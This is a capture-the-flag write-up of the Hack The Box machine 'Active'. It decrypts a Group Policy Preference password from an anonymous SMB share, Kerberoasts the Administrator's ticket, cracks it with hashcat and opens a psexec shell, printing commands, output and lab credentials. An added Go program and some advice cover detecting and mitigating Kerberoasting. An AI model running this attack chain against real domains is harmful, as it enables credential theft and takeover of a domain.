Active - [HTB]

Marmeus

Introduction

Active is an easy Windows machine from Hack The Box where the attacker has to dig through the available Windows shares in order to find a Group Policy Preference credential for a user account in the Active Directory domain. Finally, by Kerberoasting we are able to identify a service running as Administrator and obtain the Administrator's Kerberos 5 TGS hash for later password cracking, granting us an interactive shell.

Enumeration

As always, let's start by finding all open ports on the machine with nmap.

kali@kali:~/Documents/HTB/Active$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.100
Host is up (0.049s latency).
Not shown: 65491 closed ports
PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
268/tcp   filtered td-replica
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
[...]

# Nmap done at Sun Jul  4 17:18:50 2021 -- 1 IP address (1 host up) scanned in 88.19 seconds

Then, we continue with a deeper scan of every open port, getting more information about each service.

kali@kali:~/Documents/HTB/Active$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.098s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 21:48:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
[...]
Host script results:
|_clock-skew: 12m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T21:49:00
|_  start_date: 2021-07-04T17:54:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 17:36:31 2021 -- 1 IP address (1 host up) scanned in 70.35 seconds

Enumerating the Windows shares with smbmap shows that the Replication share is readable without any credentials.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                10459647 blocks of size 4096. 5728355 blocks available

Looking inside, there is a Groups.xml file at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\.

kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                10459647 blocks of size 4096. 5721526 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> 

Exploitation

This file contains the username active.htb\SVC_TGS and its encrypted password in the cpassword attribute. Group Policy Preference passwords are encrypted with AES-256 using a static key that Microsoft published in its own documentation, so anyone who can read the file can recover the plaintext; this is why Microsoft removed the ability to store passwords in preferences with MS14-025.

kali@kali:~/Documents/HTB/Active$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

In order to decrypt the password we only need to run gpp-decrypt with the cpassword value.

kali@kali:~/Documents/HTB/Active$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

Now, with the SVC_TGS credentials, we have read access to the Users share (and to NETLOGON and SYSVOL as well).

kali@kali:~/Documents/HTB/Active$ smbmap -H 10.10.10.100 -u SVC_TGS -p  GPPstillStandingStrong2k18 
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

Inside it we can find the user flag in the directory \SVC_TGS\Desktop\.

kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Users -U "SVC_TGS%GPPstillStandingStrong2k18"
smb: \> cd SVC_TGS/Desktop/
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018                  
  user.txt   

                10459647 blocks of size 4096. 5721270 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Privilege Escalation

Because we now have domain credentials, we can try Kerberoasting with Impacket's GetUserSPNs.py: it queries LDAP for user accounts that have a ServicePrincipalName set and requests a TGS ticket for each of them. Part of that ticket is encrypted with the service account's password hash, so it can be cracked offline.

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783         

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

However, we hit an issue due to the time difference between our machine and the Kerberos service: the KDC rejects requests whose timestamp is more than five minutes away from its own clock, and nmap had already reported a clock skew of 12m34s. In order to fix this problem we only need to synchronise our clock with the domain controller using the following commands.

kali@kali:~/Documents/HTB/Active$ sudo apt install ntpdate -y
kali@kali:~/Documents/HTB/Active$ sudo ntpdate 10.10.10.100
 5 Jul 08:09:15 ntpdate[10305]: step time server 10.10.10.100 offset +754.495116 sec

Once fixed, we obtain the Administrator's TGS ticket in hashcat format (the -outputfile option writes it to GetUserSPNs.txt).

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783

kali@kali:~/Documents/HTB/Active$ cat GetUserSPNs.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$493a9db3c8618a0037b2e1bec356a0c8$[...]
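Seen from the defender's side, the request above lands on the domain controller as Security event 4769 (a Kerberos service ticket was requested) with encryption type 0x17, which is RC4-HMAC, the etype 23 in the $krb5tgs$23$ hash, for a user-account SPN rather than a computer account. The following Go program is an added example, not code from the writeup or from Impacket: it runs that detection logic over a few constructed 4769/4768 records in a flattened key=value form (the field names follow the Windows event fields, while the values, the DC$ computer account, the extra sqlsvc SPN and the IP addresses are made up) and groups suspicious requests by requesting account and source address.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// sampleEvents is a constructed sample of Security events 4769 (service
// ticket requested) and 4768 (TGT requested), one per line; these are not
// real logs from the machine.
const sampleEvents = `EventID=4769 Time=2021-07-04T21:49:10Z TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 Time=2021-07-04T21:49:10Z TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.14.5 Status=0x0
EventID=4768 Time=2021-07-04T21:49:09Z TargetUserName=SVC_TGS ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 Time=2021-07-04T21:50:02Z TargetUserName=alice@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.10.50 Status=0x0
EventID=4769 Time=2021-07-04T21:50:03Z TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 Time=2021-07-04T21:50:04Z TargetUserName=bob@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.10.10.51 Status=0x1F`

// Event is one flattened log record (hypothetical type for this example).
type Event map[string]string

// ParseEvent splits a "key=value key=value" line into a map.
func ParseEvent(line string) Event {
	e := Event{}
	for _, field := range strings.Fields(line) {
		kv := strings.SplitN(field, "=", 2)
		if len(kv) == 2 {
			e[kv[0]] = kv[1]
		}
	}
	return e
}

// IsKerberoastCandidate is true for a successful 4769 that requested an
// RC4-HMAC (0x17) service ticket for a user account SPN. Computer accounts
// (name ending in '$') and krbtgt are excluded: tickets for them are not
// what Kerberoasting is after.
func IsKerberoastCandidate(e Event) bool {
	if e["EventID"] != "4769" || e["Status"] != "0x0" {
		return false
	}
	if !strings.EqualFold(e["TicketEncryptionType"], "0x17") {
		return false
	}
	svc := e["ServiceName"]
	if svc == "" || strings.HasSuffix(svc, "$") || strings.EqualFold(svc, "krbtgt") {
		return false
	}
	return true
}

// Finding summarises the RC4 service tickets one requester asked for.
type Finding struct {
	Requester string
	Source    string
	Services  []string
}

// DetectKerberoasting groups candidate events by requesting account and
// source IP and reports every pair that asked for at least minServices
// distinct user-account SPNs; raise minServices to tune out noise in
// domains where RC4 tickets are still common.
func DetectKerberoasting(log string, minServices int) []Finding {
	type key struct{ user, ip string }
	seen := map[key]map[string]bool{}
	for _, line := range strings.Split(log, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		e := ParseEvent(line)
		if !IsKerberoastCandidate(e) {
			continue
		}
		k := key{e["TargetUserName"], e["IpAddress"]}
		if seen[k] == nil {
			seen[k] = map[string]bool{}
		}
		seen[k][e["ServiceName"]] = true
	}
	var out []Finding
	for k, svcs := range seen {
		if len(svcs) < minServices {
			continue
		}
		f := Finding{Requester: k.user, Source: k.ip}
		for s := range svcs {
			f.Services = append(f.Services, s)
		}
		sort.Strings(f.Services)
		out = append(out, f)
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Requester < out[j].Requester })
	return out
}

func main() {
	for _, f := range DetectKerberoasting(sampleEvents, 1) {
		fmt.Printf("%s from %s requested RC4 tickets for %v\n", f.Requester, f.Source, f.Services)
	}
}
```

On a 2008 R2 domain like this one RC4 tickets are routine, so the rule has to be baselined per account; the stronger long-term fix is to enforce AES on service accounts (or use group Managed Service Accounts with random passwords), after which a 0x17 request for a user SPN becomes a rare and high-signal event.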

Using hashcat in mode 13100 (Kerberos 5 TGS-REP etype 23) with the rockyou wordlist we can retrieve the Administrator's password.

kali@kali:~/Documents/HTB/Active$ hashcat -m 13100 -a 0 GetUserSPNs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
=============================================================================================================================                                      
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU

Host memory required for this attack: 134 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507                         
* Keyspace..: 14344385

[....]:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...217971
Time.Started.....: Mon Jul  5 08:12:39 2021 (14 secs)
Time.Estimated...: Mon Jul  5 08:12:53 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   753.3 kH/s (7.93ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Mon Jul  5 08:12:22 2021
Stopped: Mon Jul  5 08:12:55 2021

Finally, in order to obtain an interactive shell as Administrator we can use Impacket's psexec.py with the cracked credentials.

kali@kali:~/Documents/HTB/Active$ psexec.py "active.htb/administrator:Ticketmaster1968"@10.10.10.100
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ZxHDWdnx.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RlII on 10.10.10.100.....
[*] Starting service RlII.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
[CENSORED]